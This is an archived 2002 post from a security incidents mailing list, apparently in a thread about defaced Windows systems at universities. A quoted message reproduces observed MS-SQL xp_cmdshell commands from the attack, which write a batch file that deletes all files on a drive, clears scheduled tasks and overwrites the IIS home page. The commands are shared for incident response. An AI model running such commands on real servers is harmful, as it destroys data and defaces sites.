RE: Windows Systems Defaced

From: Brenna Primrose (drxlecterat_private)
Date: Fri May 03 2002 - 10:17:47 PDT

Next message: Johannes B. Ullrich: "RE: Windows Systems Defaced"

Previous message: H C: "Re: 'rooted' NT/2K boxen?"
In reply to: Steve Zenone: "RE: Windows Systems Defaced"
Next in thread: Johannes B. Ullrich: "RE: Windows Systems Defaced"
Next in thread: David Ashwood: "RE: Windows Systems Defaced"
Reply: Johannes B. Ullrich: "RE: Windows Systems Defaced"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I saw SQL probes today on several of our systems from wanadoo.fr --
coincidence?  I think not.  Wanadoo.fr is infamous for looking for FTP
servers to crack.  Hmmm...


AIM - abosolut x psycho
Yahoo! - absolut_contagion
ICQ - 1363187
http://gsa.creighton.edu
http://profiles.yahoo.com/absolut_contagion
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ 
O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ 
G e* h- r++ x+ 
------END GEEK CODE BLOCK------

-----Original Message-----
From: Steve Zenone [mailto:zenoneat_private] 
Sent: Thursday, May 02, 2002 10:24 PM
To: incidentsat_private
Cc: thompsonat_private
Subject: RE: Windows Systems Defaced

Hello,

Stephen W. Thompson wrote:
|> Have any of you seen similar activity? Any thoughts?
|
|Yes, we had one that matches most of your details.  These
|are exact matches:
|
|>  [] Damage occurred around 1600 on 5/1/2002
|BUT=>   (approx. 16:00 EDT for us)
|>  [] Win-popup message with "F---ing University of Rochester"
|>       -- NOTE: not all systems running IIS
|>  [] Admins claimed that all systems were patched correctly
|>  [] Most were running updated and current AV

Thank you very much for your reply - it definitely helps!

We have been seeing MS-SQL (1433/tcp) attacks that try and execute 
the following: 

-----BEGIN SNIPPET-----
    xp_cmdshell 'echo net send localhost F---ing University of Rochester

rebooting... > rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'

    xp_cmdshell 'at /delete /y'

    xp_cmdshell 'echo if exist \inetpub\wwwroot\ type 
%systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> 
rochester.bat'
-----END SNIPPET-----





----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Johannes B. Ullrich: "RE: Windows Systems Defaced"
Previous message: H C: "Re: 'rooted' NT/2K boxen?"
In reply to: Steve Zenone: "RE: Windows Systems Defaced"
Next in thread: Johannes B. Ullrich: "RE: Windows Systems Defaced"
Next in thread: David Ashwood: "RE: Windows Systems Defaced"
Reply: Johannes B. Ullrich: "RE: Windows Systems Defaced"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri May 03 2002 - 11:42:50 PDT